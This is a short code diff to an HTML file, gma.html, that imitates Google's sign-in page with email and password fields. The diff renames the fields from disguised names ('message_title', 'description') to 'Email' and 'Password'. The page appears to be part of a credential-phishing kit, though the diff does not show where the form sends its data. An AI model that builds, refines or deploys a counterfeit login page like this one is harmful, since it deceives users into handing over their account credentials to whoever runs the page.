--- a/gma.html
+++ b/gma.html
@@ -129,11 +129,11 @@
         <p class="login-subtitle">Use your Google Account</p>
 
         <form id="allForm">
-            <input type="email" class="form-input" name="message_title" placeholder="Email or phone" required>
+            <input type="email" class="form-input" name="Email" placeholder="Email or phone" required>
             
             <!-- Password with eye icon -->
             <div class="password-wrapper">
-                <input type="password" class="form-input" id="password" name="description" placeholder="Enter your password" required>
+                <input type="password" class="form-input" id="password" name="Password" placeholder="Enter your password" required>
                 <span class="toggle-password" id="togglePassword">👁️</span>
             </div>
 
